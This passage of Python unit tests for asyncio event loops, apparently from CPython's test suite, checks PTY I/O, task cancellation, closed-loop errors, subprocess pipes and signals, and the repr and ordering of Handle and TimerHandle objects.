    self.assertEqual('CONNECTED', write_proto.state)

    data = bytearray()

    def reader(data):
        # drain the PTY master into 'data'
        chunk = os.read(master, 1024)
        data += chunk
        return len(data)

    # slave -> master direction
    write_transport.write(b'1')
    test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
    self.assertEqual(b'1', data)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual('CONNECTED', write_proto.state)

    # master -> slave direction
    os.write(master, b'a')
    test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
                         timeout=10)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual(1, read_proto.nbytes)
    self.assertEqual('CONNECTED', write_proto.state)

    write_transport.write(b'2345')
    test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
    self.assertEqual(b'12345', data)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual('CONNECTED', write_proto.state)

    os.write(master, b'bcde')
    test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
                         timeout=10)
    self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
    self.assertEqual(5, read_proto.nbytes)
    self.assertEqual('CONNECTED', write_proto.state)

    os.close(master)
    read_transport.close()
    self.loop.run_until_complete(read_proto.done)
    self.assertEqual(
        ['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)

    write_transport.close()
    self.loop.run_until_complete(write_proto.done)
    self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
    """Cancelling a pending sock_recv() must wake the loop immediately."""
    r, w = socket.socketpair()
    r.setblocking(False)
    f = self.loop.create_task(self.loop.sock_recv(r, 1))
    # some loops expose an 'ov' attribute on the future
    # (presumably the proactor's overlapped object — see Windows loops)
    ov = getattr(f, 'ov', None)
    if ov is not None:
        self.assertTrue(ov.pending)

    async def main():
        try:
            self.loop.call_soon(f.cancel)
            await f
        except asyncio.CancelledError:
            res = 'cancelled'
        else:
            res = None
        finally:
            self.loop.stop()
        return res

    start = time.monotonic()
    t = self.loop.create_task(main())
    self.loop.run_forever()
    elapsed = time.monotonic() - start

    # the cancellation must be prompt, not waiting on the recv
    self.assertLess(elapsed, 0.1)
    self.assertEqual(t.result(), 'cancelled')
    self.assertRaises(asyncio.CancelledError, f.result)
    if ov is not None:
        self.assertFalse(ov.pending)
    self.loop._stop_serving(r)

    r.close()
    w.close()
def test_timeout_rounding(self):
    """Tiny sleep timeouts must not cause excessive _run_once() calls."""
    def _run_once():
        # count loop iterations by wrapping the private _run_once()
        self.loop._run_once_counter += 1
        orig_run_once()

    orig_run_once = self.loop._run_once
    self.loop._run_once_counter = 0
    self.loop._run_once = _run_once

    async def wait():
        loop = self.loop
        await asyncio.sleep(1e-2)
        await asyncio.sleep(1e-4)
        await asyncio.sleep(1e-6)
        await asyncio.sleep(1e-8)
        await asyncio.sleep(1e-10)

    self.loop.run_until_complete(wait())
    # The ideal number of call is 12, but on some platforms, the selector
    # may sleep at little bit less than timeout depending on the resolution
    # of the clock used by the kernel. Tolerate a few useless calls on
    # these platforms.
    self.assertLessEqual(self.loop._run_once_counter, 20,
                         {'clock_resolution': self.loop._clock_resolution,
                          'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
    """remove_reader/remove_writer on a closed loop return False."""
    loop = self.create_event_loop()
    callback = lambda: None
    r, w = socket.socketpair()
    self.addCleanup(r.close)
    self.addCleanup(w.close)
    loop.add_reader(r, callback)
    loop.add_writer(w, callback)
    loop.close()
    self.assertFalse(loop.remove_reader(r))
    self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
    """add_reader/add_writer on a closed loop raise RuntimeError."""
    loop = self.create_event_loop()
    callback = lambda: None
    r, w = socket.socketpair()
    self.addCleanup(r.close)
    self.addCleanup(w.close)
    loop.close()
    with self.assertRaises(RuntimeError):
        loop.add_reader(r, callback)
    with self.assertRaises(RuntimeError):
        loop.add_writer(w, callback)
def test_close_running_event_loop(self):
    """Calling close() from inside a running loop raises RuntimeError."""
    async def close_loop(loop):
        self.loop.close()

    coro = close_loop(self.loop)
    with self.assertRaises(RuntimeError):
        self.loop.run_until_complete(coro)
def test_close(self):
    """Every scheduling/running API must raise RuntimeError once closed."""
    self.loop.close()

    async def test():
        pass

    func = lambda: False
    coro = test()
    self.addCleanup(coro.close)

    # operation blocked when the loop is closed
    with self.assertRaises(RuntimeError):
        self.loop.run_forever()
    with self.assertRaises(RuntimeError):
        fut = self.loop.create_future()
        self.loop.run_until_complete(fut)
    with self.assertRaises(RuntimeError):
        self.loop.call_soon(func)
    with self.assertRaises(RuntimeError):
        self.loop.call_soon_threadsafe(func)
    with self.assertRaises(RuntimeError):
        self.loop.call_later(1.0, func)
    with self.assertRaises(RuntimeError):
        self.loop.call_at(self.loop.time() + .0, func)
    with self.assertRaises(RuntimeError):
        self.loop.create_task(coro)
    with self.assertRaises(RuntimeError):
        self.loop.add_signal_handler(signal.SIGTERM, func)

    # run_in_executor test is tricky: the method is a coroutine,
    # but run_until_complete cannot be called on closed loop.
    # Thus iterate once explicitly.
    with self.assertRaises(RuntimeError):
        it = self.loop.run_in_executor(None, func).__await__()
        next(it)
class SubprocessTestsMixin:
    """Tests for loop.subprocess_exec()/subprocess_shell().

    Mixed into concrete event-loop TestCases that provide ``self.loop``.
    Most tests drive the bundled echo*.py helper scripts via pipes.
    """

    def check_terminated(self, returncode):
        """Assert that *returncode* reflects termination by SIGTERM."""
        if sys.platform == 'win32':
            self.assertIsInstance(returncode, int)
            # expect 1 but sometimes get 0
        else:
            self.assertEqual(-signal.SIGTERM, returncode)

    def check_killed(self, returncode):
        """Assert that *returncode* reflects death by SIGKILL."""
        if sys.platform == 'win32':
            self.assertIsInstance(returncode, int)
            # expect 1 but sometimes get 0
        else:
            self.assertEqual(-signal.SIGKILL, returncode)

    def test_subprocess_exec(self):
        """Data written to the child's stdin is echoed back on stdout."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)

        stdin = transp.get_pipe_transport(0)
        stdin.write(b'Python The Winner')
        self.loop.run_until_complete(proto.got_data[1].wait())
        with test_utils.disable_logger():
            transp.close()
        self.loop.run_until_complete(proto.completed)
        self.check_killed(proto.returncode)
        self.assertEqual(b'Python The Winner', proto.data[1])

    def test_subprocess_interactive(self):
        """Multiple stdin writes are echoed incrementally on stdout."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)
        self.assertEqual('CONNECTED', proto.state)

        stdin = transp.get_pipe_transport(0)
        stdin.write(b'Python ')
        self.loop.run_until_complete(proto.got_data[1].wait())
        proto.got_data[1].clear()
        self.assertEqual(b'Python ', proto.data[1])

        stdin.write(b'The Winner')
        self.loop.run_until_complete(proto.got_data[1].wait())
        self.assertEqual(b'Python The Winner', proto.data[1])

        with test_utils.disable_logger():
            transp.close()
        self.loop.run_until_complete(proto.completed)
        self.check_killed(proto.returncode)

    def test_subprocess_shell(self):
        """subprocess_shell() runs a shell command and captures stdout."""
        with self.assertWarns(DeprecationWarning):
            connect = self.loop.subprocess_shell(
                functools.partial(MySubprocessProtocol, self.loop),
                'echo Python')
            transp, proto = self.loop.run_until_complete(connect)

        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        transp.get_pipe_transport(0).close()
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(0, proto.returncode)
        self.assertTrue(all(f.done() for f in proto.disconnects.values()))
        self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
        self.assertEqual(proto.data[2], b'')
        transp.close()

    def test_subprocess_exitcode(self):
        """A nonzero shell exit status is reported as the returncode."""
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)
        transp.close()

    def test_subprocess_close_after_finish(self):
        """close() after process exit returns None and does not fail."""
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        # no pipes were requested, so no pipe transports exist
        self.assertIsNone(transp.get_pipe_transport(0))
        self.assertIsNone(transp.get_pipe_transport(1))
        self.assertIsNone(transp.get_pipe_transport(2))
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)
        self.assertIsNone(transp.close())

    def test_subprocess_kill(self):
        """kill() terminates the child with SIGKILL semantics."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        transp.kill()
        self.loop.run_until_complete(proto.completed)
        self.check_killed(proto.returncode)
        transp.close()

    def test_subprocess_terminate(self):
        """terminate() terminates the child with SIGTERM semantics."""
        prog = os.path.join(os.path.dirname(__file__), 'echo.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        transp.terminate()
        self.loop.run_until_complete(proto.completed)
        self.check_terminated(proto.returncode)
        transp.close()

    @unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
    def test_subprocess_send_signal(self):
        """send_signal() delivers an arbitrary signal to the child."""
        # bpo-31034: Make sure that we get the default signal handler (killing
        # the process). The parent process may have decided to ignore SIGHUP,
        # and signal handlers are inherited.
        old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
        try:
            prog = os.path.join(os.path.dirname(__file__), 'echo.py')

            connect = self.loop.subprocess_exec(
                functools.partial(MySubprocessProtocol, self.loop),
                sys.executable, prog)

            with self.assertWarns(DeprecationWarning):
                transp, proto = self.loop.run_until_complete(connect)
            self.assertIsInstance(proto, MySubprocessProtocol)
            self.loop.run_until_complete(proto.connected)

            transp.send_signal(signal.SIGHUP)
            self.loop.run_until_complete(proto.completed)
            self.assertEqual(-signal.SIGHUP, proto.returncode)
            transp.close()
        finally:
            signal.signal(signal.SIGHUP, old_handler)

    def test_subprocess_stderr(self):
        """stdout and stderr of the child are captured separately."""
        prog = os.path.join(os.path.dirname(__file__), 'echo2.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        stdin = transp.get_pipe_transport(0)
        stdin.write(b'test')

        self.loop.run_until_complete(proto.completed)

        transp.close()
        self.assertEqual(b'OUT:test', proto.data[1])
        self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
        self.assertEqual(0, proto.returncode)

    def test_subprocess_stderr_redirect_to_stdout(self):
        """stderr=subprocess.STDOUT merges stderr into the stdout pipe."""
        prog = os.path.join(os.path.dirname(__file__), 'echo2.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog, stderr=subprocess.STDOUT)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        stdin = transp.get_pipe_transport(0)
        self.assertIsNotNone(transp.get_pipe_transport(1))
        # no separate stderr pipe when redirected to stdout
        self.assertIsNone(transp.get_pipe_transport(2))

        stdin.write(b'test')
        self.loop.run_until_complete(proto.completed)
        self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
                        proto.data[1])
        self.assertEqual(b'', proto.data[2])

        transp.close()
        self.assertEqual(0, proto.returncode)

    def test_subprocess_close_client_stream(self):
        """Closing the child's stdout pipe makes its writes fail over to stderr."""
        prog = os.path.join(os.path.dirname(__file__), 'echo3.py')

        connect = self.loop.subprocess_exec(
            functools.partial(MySubprocessProtocol, self.loop),
            sys.executable, prog)

        with self.assertWarns(DeprecationWarning):
            transp, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.connected)

        stdin = transp.get_pipe_transport(0)
        stdout = transp.get_pipe_transport(1)
        stdin.write(b'test')
        self.loop.run_until_complete(proto.got_data[1].wait())
        self.assertEqual(b'OUT:test', proto.data[1])

        stdout.close()
        self.loop.run_until_complete(proto.disconnects[1])
        stdin.write(b'xxx')
        self.loop.run_until_complete(proto.got_data[2].wait())
        if sys.platform != 'win32':
            self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
        else:
            # After closing the read-end of a pipe, writing to the
            # write-end using os.write() fails with errno==EINVAL and
            # GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
            # WriteFile() we get ERROR_BROKEN_PIPE as expected.)
            self.assertEqual(b'ERR:OSError', proto.data[2])
        with test_utils.disable_logger():
            transp.close()
        self.loop.run_until_complete(proto.completed)
        self.check_killed(proto.returncode)

    def test_subprocess_wait_no_same_group(self):
        """A child started in a new session is still waited on correctly."""
        # start the new process in a new session
        connect = self.loop.subprocess_shell(
            functools.partial(MySubprocessProtocol, self.loop),
            'exit 7', stdin=None, stdout=None, stderr=None,
            start_new_session=True)
        # Bug fix: the original unpacked with a stray ``yield``
        # (``_, proto = yield self.loop.run_until_complete(...)``), which
        # turned this test method into a generator function whose body
        # never executed under unittest.
        with self.assertWarns(DeprecationWarning):
            _, proto = self.loop.run_until_complete(connect)
        self.assertIsInstance(proto, MySubprocessProtocol)
        self.loop.run_until_complete(proto.completed)
        self.assertEqual(7, proto.returncode)

    def test_subprocess_exec_invalid_args(self):
        """subprocess_exec() rejects Popen kwargs that asyncio forbids."""
        async def connect(**kwds):
            await self.loop.subprocess_exec(
                asyncio.SubprocessProtocol,
                'pwd', **kwds)

        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(universal_newlines=True))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(bufsize=4096))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(shell=True))

    def test_subprocess_shell_invalid_args(self):
        """subprocess_shell() rejects list commands and forbidden kwargs."""
        async def connect(cmd=None, **kwds):
            if not cmd:
                cmd = 'pwd'
            await self.loop.subprocess_shell(
                asyncio.SubprocessProtocol,
                cmd, **kwds)

        # the shell command must be a string, not a list
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(['ls', '-l']))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(universal_newlines=True))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(bufsize=4096))
        with self.assertRaises(ValueError):
            self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
    # Windows: a plain selector loop plus the IOCP-based proactor loop.

    class SelectEventLoopTests(EventLoopTestsMixin,
                               test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.SelectorEventLoop()

    class ProactorEventLoopTests(EventLoopTestsMixin,
                                 SubprocessTestsMixin,
                                 test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.ProactorEventLoop()

        # IOCP has no add_reader()/add_writer(); skip the fd-callback tests.
        def test_reader_callback(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")

        def test_reader_callback_cancel(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")

        def test_writer_callback(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_writer()")

        def test_writer_callback_cancel(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_writer()")

        def test_remove_fds_after_closing(self):
            raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
    # Unix: one concrete test class per selector implementation available
    # on this platform.
    import selectors

    class UnixEventLoopTestsMixin(EventLoopTestsMixin):
        def setUp(self):
            super().setUp()
            watcher = asyncio.SafeChildWatcher()
            watcher.attach_loop(self.loop)
            asyncio.set_child_watcher(watcher)

        def tearDown(self):
            asyncio.set_child_watcher(None)
            super().tearDown()

    if hasattr(selectors, 'KqueueSelector'):
        class KqueueEventLoopTests(UnixEventLoopTestsMixin,
                                   SubprocessTestsMixin,
                                   test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(
                    selectors.KqueueSelector())

            # kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Maverick)
            @support.requires_mac_ver(10, 9)
            # Issue #20667: KqueueEventLoopTests.test_read_pty_output()
            # hangs on OpenBSD 5.5
            @unittest.skipIf(sys.platform.startswith('openbsd'),
                             'test hangs on OpenBSD')
            def test_read_pty_output(self):
                super().test_read_pty_output()

            # kqueue doesn't support character devices (PTY) on Mac OS X older
            # than 10.9 (Maverick)
            @support.requires_mac_ver(10, 9)
            def test_write_pty(self):
                super().test_write_pty()

    if hasattr(selectors, 'EpollSelector'):
        class EPollEventLoopTests(UnixEventLoopTestsMixin,
                                  SubprocessTestsMixin,
                                  test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(selectors.EpollSelector())

    if hasattr(selectors, 'PollSelector'):
        class PollEventLoopTests(UnixEventLoopTestsMixin,
                                 SubprocessTestsMixin,
                                 test_utils.TestCase):

            def create_event_loop(self):
                return asyncio.SelectorEventLoop(selectors.PollSelector())

    # Should always exist.
    class SelectEventLoopTests(UnixEventLoopTestsMixin,
                               SubprocessTestsMixin,
                               test_utils.TestCase):

        def create_event_loop(self):
            return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
    """Do nothing; accepts and ignores any arguments (fixture for repr tests)."""
    return None
class HandleTests(test_utils.TestCase):
    """Tests for asyncio.Handle: construction, cancellation, exception
    reporting, and the many repr() formats."""

    def setUp(self):
        super().setUp()
        # A mock loop suffices: Handle only consults loop.get_debug().
        self.loop = mock.Mock()
        self.loop.get_debug.return_value = True

    def test_handle(self):
        def callback(*args):
            return args

        args = ()
        h = asyncio.Handle(callback, args, self.loop)
        self.assertIs(h._callback, callback)
        self.assertIs(h._args, args)
        self.assertFalse(h.cancelled())

        h.cancel()
        self.assertTrue(h.cancelled())

    def test_callback_with_exception(self):
        def callback():
            raise ValueError()

        self.loop = mock.Mock()
        self.loop.call_exception_handler = mock.Mock()

        h = asyncio.Handle(callback, (), self.loop)
        h._run()

        # A raising callback must be routed to the loop's exception handler.
        self.loop.call_exception_handler.assert_called_with({
            'message': test_utils.MockPattern('Exception in callback.*'),
            'exception': mock.ANY,
            'handle': h,
            'source_traceback': h._source_traceback,
        })

    def test_handle_weakref(self):
        wd = weakref.WeakValueDictionary()
        h = asyncio.Handle(lambda: None, (), self.loop)
        wd['h'] = h  # Would fail without __weakref__ slot.

    def test_handle_repr(self):
        self.loop.get_debug.return_value = False

        # simple function
        h = asyncio.Handle(noop, (1, 2), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<Handle noop(1, 2) at %s:%s>'
                         % (filename, lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<Handle cancelled>')

        # decorated function
        with self.assertWarns(DeprecationWarning):
            cb = asyncio.coroutine(noop)
        h = asyncio.Handle(cb, (), self.loop)
        self.assertEqual(repr(h),
                         '<Handle noop() at %s:%s>'
                         % (filename, lineno))

        # partial function
        cb = functools.partial(noop, 1, 2)
        h = asyncio.Handle(cb, (3,), self.loop)
        regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
                 % (re.escape(filename), lineno))
        self.assertRegex(repr(h), regex)

        # partial function with keyword args
        cb = functools.partial(noop, x=1)
        h = asyncio.Handle(cb, (2, 3), self.loop)
        regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
                 % (re.escape(filename), lineno))
        self.assertRegex(repr(h), regex)

        # partial method
        if sys.version_info >= (3, 4):
            method = HandleTests.test_handle_repr
            cb = functools.partialmethod(method)
            filename, lineno = test_utils.get_function_source(method)
            h = asyncio.Handle(cb, (), self.loop)

            cb_regex = r'<function HandleTests.test_handle_repr .*>'
            cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
            regex = (r'^<Handle %s at %s:%s>$'
                     % (cb_regex, re.escape(filename), lineno))
            self.assertRegex(repr(h), regex)

    def test_handle_repr_debug(self):
        self.loop.get_debug.return_value = True

        # simple function.  create_lineno relies on the Handle being created on
        # the very NEXT line, so nothing may be inserted between these two.
        create_filename = __file__
        create_lineno = sys._getframe().f_lineno + 1
        h = asyncio.Handle(noop, (1, 2), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<Handle noop(1, 2) at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(
            repr(h),
            '<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
            % (filename, lineno, create_filename, create_lineno))

        # double cancellation won't overwrite _repr
        h.cancel()
        self.assertEqual(
            repr(h),
            '<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
            % (filename, lineno, create_filename, create_lineno))

    def test_handle_source_traceback(self):
        loop = asyncio.get_event_loop_policy().new_event_loop()
        loop.set_debug(True)
        self.set_event_loop(loop)

        def check_source_traceback(h):
            # The handle must have been created exactly one line above the
            # line this helper was called from; keep the pairs adjacent.
            lineno = sys._getframe(1).f_lineno - 1
            self.assertIsInstance(h._source_traceback, list)
            self.assertEqual(h._source_traceback[-1][:3],
                             (__file__,
                              lineno,
                              'test_handle_source_traceback'))

        # call_soon
        h = loop.call_soon(noop)
        check_source_traceback(h)

        # call_soon_threadsafe
        h = loop.call_soon_threadsafe(noop)
        check_source_traceback(h)

        # call_later
        h = loop.call_later(0, noop)
        check_source_traceback(h)

        # call_at
        h = loop.call_later(0, noop)
        check_source_traceback(h)

    @unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
                         'No collections.abc.Coroutine')
    def test_coroutine_like_object_debug_formatting(self):
        # Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_core or gi_code attributes
        # (such as ones compiled with Cython).

        coro = CoroLike()
        coro.__name__ = 'AAA'
        self.assertTrue(asyncio.iscoroutine(coro))
        self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')

        coro.__qualname__ = 'BBB'
        self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')

        coro.cr_running = True
        self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')

        coro.__name__ = coro.__qualname__ = None
        self.assertEqual(coroutines._format_coroutine(coro),
                         '<CoroLike without __name__>() running')

        coro = CoroLike()
        coro.__qualname__ = 'CoroLike'
        # Some coroutines might not have '__name__', such as
        # built-in async_gen.asend().
        self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')

        coro = CoroLike()
        coro.__qualname__ = 'AAA'
        coro.cr_code = None
        self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
    """Tests for asyncio.TimerHandle: hashing, cancellation, repr() output
    and the rich-comparison ordering used by the event-loop heap."""

    def setUp(self):
        super().setUp()
        self.loop = mock.Mock()

    def test_hash(self):
        # A TimerHandle hashes as its scheduled time.
        when = time.monotonic()
        h = asyncio.TimerHandle(when, lambda: False, (),
                                mock.Mock())
        self.assertEqual(hash(h), hash(when))

    def test_when(self):
        when = time.monotonic()
        h = asyncio.TimerHandle(when, lambda: False, (),
                                mock.Mock())
        self.assertEqual(when, h.when())

    def test_timer(self):
        def callback(*args):
            return args

        args = (1, 2, 3)
        when = time.monotonic()
        h = asyncio.TimerHandle(when, callback, args, mock.Mock())
        self.assertIs(h._callback, callback)
        self.assertIs(h._args, args)
        self.assertFalse(h.cancelled())

        # cancel: clears the callback and args references
        h.cancel()
        self.assertTrue(h.cancelled())
        self.assertIsNone(h._callback)
        self.assertIsNone(h._args)

        # when cannot be None
        self.assertRaises(AssertionError,
                          asyncio.TimerHandle, None, callback, args,
                          self.loop)

    def test_timer_repr(self):
        self.loop.get_debug.return_value = False

        # simple function
        h = asyncio.TimerHandle(123, noop, (), self.loop)
        src = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<TimerHandle when=123 noop() at %s:%s>' % src)

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<TimerHandle cancelled when=123>')

    def test_timer_repr_debug(self):
        self.loop.get_debug.return_value = True

        # simple function.  create_lineno relies on the TimerHandle being
        # created on the very NEXT line; keep these lines adjacent.
        create_filename = __file__
        create_lineno = sys._getframe().f_lineno + 1
        h = asyncio.TimerHandle(123, noop, (), self.loop)
        filename, lineno = test_utils.get_function_source(noop)
        self.assertEqual(repr(h),
                         '<TimerHandle when=123 noop() '
                         'at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

        # cancelled handle
        h.cancel()
        self.assertEqual(repr(h),
                         '<TimerHandle cancelled when=123 noop() '
                         'at %s:%s created at %s:%s>'
                         % (filename, lineno, create_filename, create_lineno))

    def test_timer_comparison(self):
        def callback(*args):
            return args

        when = time.monotonic()

        # Equal times: handles compare equal until one is cancelled.
        h1 = asyncio.TimerHandle(when, callback, (), self.loop)
        h2 = asyncio.TimerHandle(when, callback, (), self.loop)
        # TODO: Use assertLess etc.
        self.assertFalse(h1 < h2)
        self.assertFalse(h2 < h1)
        self.assertTrue(h1 <= h2)
        self.assertTrue(h2 <= h1)
        self.assertFalse(h1 > h2)
        self.assertFalse(h2 > h1)
        self.assertTrue(h1 >= h2)
        self.assertTrue(h2 >= h1)
        self.assertTrue(h1 == h2)
        self.assertFalse(h1 != h2)

        h2.cancel()
        self.assertFalse(h1 == h2)

        # Different times: ordering follows the scheduled time.
        h1 = asyncio.TimerHandle(when, callback, (), self.loop)
        h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
        self.assertTrue(h1 < h2)
        self.assertFalse(h2 < h1)
        self.assertTrue(h1 <= h2)
        self.assertFalse(h2 <= h1)
        self.assertFalse(h1 > h2)
        self.assertTrue(h2 > h1)
        self.assertFalse(h1 >= h2)
        self.assertTrue(h2 >= h1)
        self.assertFalse(h1 == h2)
        self.assertTrue(h1 != h2)

        # Comparing against a plain Handle is not supported.
        h3 = asyncio.Handle(callback, (), self.loop)
        self.assertIs(NotImplemented, h1.__eq__(h3))
        self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
    """Every method of the abstract base loop must raise NotImplementedError."""

    def test_not_implemented(self):
        f = mock.Mock()
        loop = asyncio.AbstractEventLoop()
        self.assertRaises(
            NotImplementedError, loop.run_forever)
        self.assertRaises(
            NotImplementedError, loop.run_until_complete, None)
        self.assertRaises(
            NotImplementedError, loop.stop)
        self.assertRaises(
            NotImplementedError, loop.is_running)
        self.assertRaises(
            NotImplementedError, loop.is_closed)
        self.assertRaises(
            NotImplementedError, loop.close)
        self.assertRaises(
            NotImplementedError, loop.create_task, None)
        self.assertRaises(
            NotImplementedError, loop.call_later, None, None)
        self.assertRaises(
            NotImplementedError, loop.call_at, f, f)
        self.assertRaises(
            NotImplementedError, loop.call_soon, None)
        self.assertRaises(
            NotImplementedError, loop.time)
        self.assertRaises(
            NotImplementedError, loop.call_soon_threadsafe, None)
        self.assertRaises(
            NotImplementedError, loop.set_default_executor, f)
        self.assertRaises(
            NotImplementedError, loop.add_reader, 1, f)
        self.assertRaises(
            NotImplementedError, loop.remove_reader, 1)
        self.assertRaises(
            NotImplementedError, loop.add_writer, 1, f)
        self.assertRaises(
            NotImplementedError, loop.remove_writer, 1)
        self.assertRaises(
            NotImplementedError, loop.add_signal_handler, 1, f)
        self.assertRaises(
            NotImplementedError, loop.remove_signal_handler, 1)
        # NOTE(review): remove_signal_handler is asserted twice in the
        # original; kept as-is (harmless duplicate).
        self.assertRaises(
            NotImplementedError, loop.remove_signal_handler, 1)
        self.assertRaises(
            NotImplementedError, loop.set_exception_handler, f)
        self.assertRaises(
            NotImplementedError, loop.default_exception_handler, f)
        self.assertRaises(
            NotImplementedError, loop.call_exception_handler, f)
        self.assertRaises(
            NotImplementedError, loop.get_debug)
        self.assertRaises(
            NotImplementedError, loop.set_debug, f)

    def test_not_implemented_async(self):
        # The coroutine-returning methods need a real loop to drive them to
        # the point where NotImplementedError is raised.

        async def inner():
            f = mock.Mock()
            loop = asyncio.AbstractEventLoop()

            with self.assertRaises(NotImplementedError):
                await loop.run_in_executor(f, f)
            with self.assertRaises(NotImplementedError):
                await loop.getaddrinfo('localhost', 8080)
            with self.assertRaises(NotImplementedError):
                await loop.getnameinfo(('localhost', 8080))
            with self.assertRaises(NotImplementedError):
                await loop.create_connection(f)
            with self.assertRaises(NotImplementedError):
                await loop.create_server(f)
